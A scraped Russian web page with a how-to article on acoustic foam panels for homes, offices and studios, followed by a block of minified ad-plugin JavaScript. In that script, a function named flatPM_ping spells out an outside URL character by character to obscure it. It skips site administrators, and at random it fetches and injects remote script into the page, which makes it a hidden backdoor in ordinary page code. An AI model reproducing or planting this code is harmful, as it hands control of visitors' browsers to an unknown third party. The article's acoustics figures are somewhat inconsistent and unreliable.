98 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Акустические панели из поролона: тишина своими руками

Акустические панели из поролона: тишина своими руками

С недавних пор акустический поролон остается всегда на страже тишины и чистоты звука. Он получил свое название благодаря фирме Porolon — основному поставщику пенополиуретана во времена Советского Союза. Впервые он был изготовлен в 1929 году.

Сегодня он применяется в студиях звукозаписи и монтажа, театрах, телекомпаниях, ресторанах, а также в квартирах, кафе, ресторанах, офисах. Словом, везде, где необходимо предотвратить хаотичные колебания звука или шумовое загрязнение.

  1. Осторожно, шум!
  2. Виды акустического поролона
  3. Акустический поролон: используем для эффективной работы в офисе
  4. Звукоизоляция квартир акустическими панелями
  5. Залог качественной звукозаписи
  6. Установка панелей акустического поролона

Основные виды помещений для шумоизоляции

Подходящие помещения для использования акустического поролона — дома с одним и несколькими этажами, звукозаписывающие студии, театры, церкви и храмы, школы, производственные склады, большие офисы, аудитории. Материал уместен в комнатах с любыми габаритами.

Вспененный полиуретан можно маскировать под различными покрытиями или отделывать им предметы снаружи. Особенно органично большие панели смотрятся в студиях звукозаписи, придавая интерьеру определенный изыск и эстетический облик. Для повышения эффективности поролона между ним и стеной создается небольшая воздушная прослойка. Так панели поглощают еще большее количество падающих волн.

Звукоизоляция поролоном в быту

Ибавиться от громкого шума можно с помощью шумоизоляционных материалов. Основной источник проникновения звуков в квартиру — окна. Их можно завесить плотными шторами, приглушающими шумы, а также использовать воздушные сотовые камеры либо акустический поролон.

Сотовые сооружения, в которые от 1 до 3 сот, способны почти полностью поглотить звуки. Поролоновые панели закрепляют на стенах или потолке — это снижает неприятный шум, исходящий от соседей сверху, сбоку. При таком монтаже куски материала устанавливают как отдельную прослойку.

Звукоизоляция поролоном в коммерческих помещениях

Для шумоизоляции в больших офисах и прочих коммерческих помещениях, где регулярно преобладает большое скопление людей, используют такие же панели из акустического поролона, как и в быту. Ими отделывают стены, потолки, в результате чего снижается шумовая нагрузка.

Вспененный полиуретан гасит не только людские голоса, но и гул, исходящий от работающей офисной техники, стука дверей, ящиков, шагов. Работоспособность персонала в помещениях со звукоизоляцией многократно вырастает. Панели, установленные на производственных предприятиях и складах, приглушают звуки гудящего оборудования.

Акустическая обработка

Смысл акустической обработки комнаты в том, чтобы избавиться от искажений неподготовленной комнаты, которые на слух определяются как неприятный гул или скрежет на определенных частотах, отсутствие детализации и общая мутность звучания.

В комнате с параллельными стенами неизбежно образуется акустический резонанс. Звуковая волна сотни раз в секунду отражается от одной стены к другой и появляется «стоячая волна».

Как же быть? Есть два основных подхода к акустической обработке помещения: поглощение и рассеивание. Для первого используются звукопоглощающие материалы — акустический поролон, минеральная вата, басовые ловушки и т.п. Для рассеивания — различного вида диффузоры, которые делают поверхность стен комнаты неоднородной. А профессиональные студии намеренно проектируют «неправильно»: с непараллельными стенами и угловатыми потолками.

Высокие и средние частоты

Проблемы с высокими частотами можно легко определить, встав в центр аппаратной комнаты и хлопнув в ладоши — в неподготовленном помещении будет четко различимо короткое эхо с неприятным металлическим окрасом. Очень часто эту проблему решают акустическим поролоном. Но обклеивать поролоном все вокруг не стоит — переглушенное «по верхам» помещение будет звучать неестественно, спад высоких приведет к выпячиванию средних и низких частот. В итоге комната перестанет звенеть, но начнет гудеть и бубнить.

Для борьбы как с высокими, так и со средними частотами нередко используют акустические панели. Такая панель представляет собой кусок звукопоглощающего материала определенной толщины, обернутый в рамку и затянутый декоративной тканью.

Толщина материала для поглощения определенной частоты вычисляется делением скорости звука (331 м/с) на частоту в Герцах. Например, длина звуковой волны на частоте 10 Кгц — 3,31 см. Значит, такую волну может полностью поглотить материал толщиной всего 3,5 см. Чем толще панель, тем ниже частота звука, которую панель может поглотить.

Акустическую панель можно приобрести в готовом виде или собрать самостоятельно — в сети достаточно инструкций. Несколько панелей в критических точках комнаты — позади, спереди и по бокам от мониторов — сделают работу со средними частотами намного комфортнее.

Низкие частоты

Труднее всего справится с низкими частотами. Если посчитать, длина волны частотой 100 Гц — 3,35 метра, акустическая панель такой толщины займет всю комнату. В то же время, именно басовая составляющая заставляет комнату гудеть, окна дрожать, а соседей — стучать по трубам.

Выявить проблемы с басом в комнате довольно просто: нужно запустить в DAW какой-нибудь синтезатор и сыграть гамму от самой нижней октавы. Ноты с проблемными частотами будут ощущаться громче или тише остальных.

Как бороться с басом? Больше всего он любит накапливаться в углах помещения. Поэтому по углам стоит разместить басовые ловушки — чаще всего это акустическая панель треугольной формы или конструкции типа диффузора Шредера.

Также басовые частоты отлично распространяются по твердым материалам. Если студийные мониторы размещены на стойках — бас легко перейдет по ним в пол и далее заставит гудеть всю комнату. Помогут специальные изоляционные подкладки под мониторы или — более радикальный вариант — подиум с резиновыми изоляционными ножками, на которые нужно поставить стойки или рабочий стол целиком, развязав тем самым источник звука с комнатой.

  • Auralex DST 112 – (Amazon)
  • Auralex DST 114 – (Amazon)
  • SoundTrax PRO – (Amazon)
  • ATS Wedge – (Amazon)
  • Auralex Wedge 1ft² – (Amazon)
  • Auralex Sonoflat 1ft² – (Amazon)
  • Auralex D36 Designer Series – (Amazon)
  • Auralex 2ft² Pyramid – (Amazon)
  • Auralex 2×4 Pyramid – (Amazon)
  • Auralex Sonoflat 2ft² – (Amazon)

Особенности монтажа

Для приклеивания поролона к стенам и потолку используют клеевые составы, не содержащие органические растворители. Для этого применяют воднодисперсионные композиции на основе неопрена, полихлорпропилена и полиуретана.

Для отделки поверхностей из дерева, ДВП, ГКЛ и металла используют клей «Поролон». Для штукатурки бетона применяют специальные клеевые составы, совместимые с поролоном.

Монтаж панелей из акустического поролона производят в следующем порядке:

  1. Поверхности ограждений тщательно моют, очищают от пыли и грязи. Металл, бетон и ламинированные покрытия зачищают наждаком и грунтуют.
  2. На стены и потолок наносят разметку для приклеивания панелей.
  3. Клей наносят тонким слоем на тыльную сторону звукоизоляционных плит с помощью распылителя. Нанесённый клей вручную может скапливаться в определённых местах, что в дальнейшем вызовет сползание поролона вниз по стене.
  4. Панель прижимают к поверхности стены или потолка и выдерживают в таком положении в течение 30 секунд. Этого достаточно для, чтобы клей «схватился».

Звукоизоляция поролоном

Преимуществом применения панелей из поролона является точечное использование. Совсем не обязательно оклеивать стены, потолок и пол полностью. Для помещения в 30 кв.м. порой достаточно 3 матов, чтобы снизить издаваемый шум в несколько раз.

Ловушки для низкочастотных волн

Развеивая различные толки — акустический поролон не предназначен для изоляции от шумных соседей. Его задача заключается в отражении звуков. Они убирают не проблемные частоты, а лишь их хвосты в пространстве.

Углы комнат являются некими накопителями низких частот, которые с небольшой задержкой возвращаются к слушателю. Поролоновые ловушки убирают в углах аккумуляцию скопившейся энергии. В данном случае рельеф никак не влияет на поглощение звука, а лишь его размер и расположение.

Пористые акустические панели

Акустические поролоновые поглотители с порами открытого типа действуют по принципу поглощения шумов в структуре материала. Они являются эффективным шумопоглотителем в С/ВЧ диапазоне. Коэффициент поглощения поролоновых акустических панелей впечатляет даже на частотах низкого уровня.

Факторы поглощения звука ячеистого акустического поролона:

  1. Плотность поролона.
  2. Размерность ячеек.
  3. Наличие извилин и изгибов.
  4. Толщина панели.
  5. Количество пор в материале.

Что еще можно сделать, чтобы улучшить звукоизоляцию студии

  • Вместо обычных – нужно установить тяжелые двери с большим пластом хорошего утеплителя.
  • Стыки и соединения в дверном проеме должны быть надежно заделаны звукоизолирующими материалами, например уплотняющими лентами Липлент.
  • Смонтируйте также специальную нишу или короб для силовых и осветительных кабелей. Не стоит прятать их под гипсокартонную конструкцию со звукоизоляцией, так как есть риск повредить герметичность материалов.

Не забудьте о хорошей сплит-системе, которая обеспечит в герметичном помещении нормальную вентиляцию. Это необходимо, чтобы люди не испытывали дефицит кислорода, а также чтобы на звукозаписывающей аппаратуре не скапливалась влага. Вентиляционные отверстия необходимо также закрыть акустическим коробом в целях предотвращения утечки звука.

Если вы все сделали правильно, даже самый громкий звук останется внутри студии и не будет досаждать соседям. Затраты на обустройство окупятся вашим спокойствием и плодотворным трудом!

Виды акустических потолков

Звуковые модули называют главным компонентом акустических потолков, собирать такие модули можно различными способами. По принципу установки системы делят на полотна натяжные, подвесную потолочную конструкцию, каркасную либо бескаркасную.

Каркасный тип акустических встраиваемых конструкций оснащен модульной структурой: собирается потолок из отдельных твердых звукоизоляционных плит. А вот сам каркас собирается из обыкновенных реек и профилей разной геометрии. Готовый профиль создает подходящие по размерности ячейки для установки звукоизолирующих плит. Такой каркас обычно фиксируют непосредственно к самому потолку и стенкам, для фиксации используются тугие прокладки, которые и гасят звуковое колебание. В данной системе не существует твердых связей.

Каркасные потолки, то есть их внутренний слой формируется особыми шумопоглощающими панелями. Получается что-то типа своеобразного сэндвича, внутрь располагают звукоизоляционный материал, например, поролон. Снаружи панель отделывают красивым декоративным покрытием.

На сегодняшний день разработали много различных методов, которые позволяют расположить блоки внутри каркаса. К одной из известных вариаций каркасных потолочных конструкций относят «Армстронг» – подвесные системы, плиты в этом варианте устанавливают в верхние ячейки. В такой потолочной конструкции акустические встраиваемые плиты к профилям обычно не крепят. В готовый каркас устанавливаются различные акустические панели, подходящие по параметрам для ячеек.

Звукоизолирующая бескаркасная панельная система состоит из облицовочных материалов, акустических встроенных сэндвич-панелей. Отличается такая встраиваемая акустика от любых других систем возможным креплением панелей непосредственно к самому потолку, поэтому надобность в сборке каркаса отпадает. Этот вид фиксации становится возможным благодаря встроенному элементу крепления в сами модули.

Бескаркасные конструкции изолируют мягкой ватой, создавая как бы воздушные акустические маты. Снаружи панельки облицовываются 12,5-милиметровыми панелями из гипсоволокна, так материал обретает высокий уровень твердости. К потолку панельки крепятся сквозь особый виброразвязный узел. Акустический тип плит подбирают по звукоизоляционным параметрам.

Например, 40-миллиметровые панели отлично показали свои уникальные характеристики во время бытовой эксплуатации. А вот 70-миллиметровые модули используют, чтобы погасить средние шумы. 120-миллиметровые панели применяются в достаточно шумных комнатах, таких как концертные залы и кинотеатры.

Натяжной тип акустических потолков изготавливается из ПВХ пленки. Такой материал обладает невероятными звукоизолирующими качествами. Пленка обрабатывается специальным образом, это позволяет усилить эффект, перфорируют пленку небольшими отверстиями либо дополняют антишумовым слоем.

Огромное количество таких отверстий препятствует проникновению звуков. Шум слегка заглушается в этих отверстиях. Пленку натягивают, применяя особую технологию, крепится пленка к стеновым багетам.

Свойства звукоизоляционного поролона и его отличия от других видов звукоизоляции

Звукоизоляционный поролон обладает как безусловными преимуществами, так и некоторыми недостатками:

  • Простота монтажа. В отличие от большинства материалов для шумоизоляции, поролон наклеивается непосредственно на стену, потолок или другую поверхность.
  • Разнообразие цветов и рельефов позволяет сочетать пользу и оригинальное декоративное решение.
  • Превосходные звукоизоляционные свойства. Акустический поролон – один из самых эффективных шумоизоляторов
  • Отсутствие запаха.
  • Высокая гигроскопичность. Благодаря пористой структуре, поролон легко впитывает и удерживает воду. Поэтому нужно контролировать уровень влажности в помещении, чтобы материал не переувлажнялся, так как это может способствовать развитию плесени.
  • Сравнительно высокая стоимость. Среди шумоизоляций поролон стоит скорее в верхнем ценовом сегменте, но, если учитывать экономию на дополнительных материалах при монтаже, это не слишком влияющий фактор.
  • Уязвимость механическим воздействиям. С поролоном нужно обращаться очень бережно, так как это материал очень мягкий и легко может порваться. Для большей сохранности его иногда обтягивают тканью.
  • Горючесть. Это основной недостаток звукоизоляционного поролона. Именно из-за горючести такой вид шумоизоляции не получает значительного распространения. Этот недостаток усугубляется еще и тем, что применение противопожарных добавок или пропиток для поролона невозможно.

Комната с акустическим поролоном

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"<$1>$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n<=0&&(clearInterval(r),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};